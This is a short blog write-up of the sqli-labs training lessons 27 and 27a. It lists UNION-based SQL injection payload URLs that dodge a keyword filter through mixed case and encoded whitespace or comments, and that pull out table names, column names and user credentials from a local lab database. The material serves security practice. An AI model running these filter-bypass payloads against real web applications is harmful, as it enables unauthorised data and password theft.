sqli-27,27a

27 - php 5.3.8

union and select are filtered.

Look at the source to see which function does the filtering; with uNion and sElect I think it can simply be bypassed like that.

In SQL injection, closing the quote is the real essence; being as green as I am, of course I just read the source.

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Instantly clear: single-quote closure. My gloomy mood left me with no appetite for testing by hand, so straight to the source!

http://127.0.0.1/sqli-labs/Less-27/?id==1'%a0uniOn%a0sElEct%a01,database(),3%a0%26%26%a0'1'='1

http://127.0.0.1/sqli-labs/Less-27/?id=0'%0bUnIon%0bSeLect%0b1,database(),3'  # database

http://127.0.0.1/sqli-labs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(table_name)/*%0a*/from/*%0a*/information_schema.tables/*%0a*/where/*%0a*/table_schema='security'),4/*%0a*/||/*%0a*/'1'='1  # tables

http://127.0.0.1/sqli-labs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(column_name)/*%0a*/from/*%0a*/information_schema.columns/*%0a*/where/*%0a*/table_name='users'),4/*%0a*/||/*%0a*/'1'='1  # columns of the table

http://127.0.0.1/sqli-labs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(concat_ws('$',id,username,password))/*%0a*/from/*%0a*/users),4/*%0a*/||/*%0a*/'1'='1  # data

27a

http://127.0.0.1/sqli-labs/Less-27a/?id=0%22/*%09*/unIon%09/*SeleCt*/%091,database%28%29,3%20||%221  # database

http://127.0.0.1/sqli-labs/Less-27a/?id=0"/*%09*/unIon%09/*SeleCt*/%091,(SeleCt%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='security'),3||"1  # tables

http://127.0.0.1/sqli-labs/Less-27a/?id=0"/*%09*/unIon%09/*SeleCt*/%091,(SeleCt%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema='security'%09and%09table_name='users'),3||"1  # columns

http://127.0.0.1/sqli-labs/Less-27a/?id=0"/*%09*/unIon%09/*SeleCt*/%091,(SeleCt%09group_concat(username,0x7e,password)%09from%09users),3||"1  # data

posted @ 2020-04-27 17:24  llcnKill  views (263)  comments (0)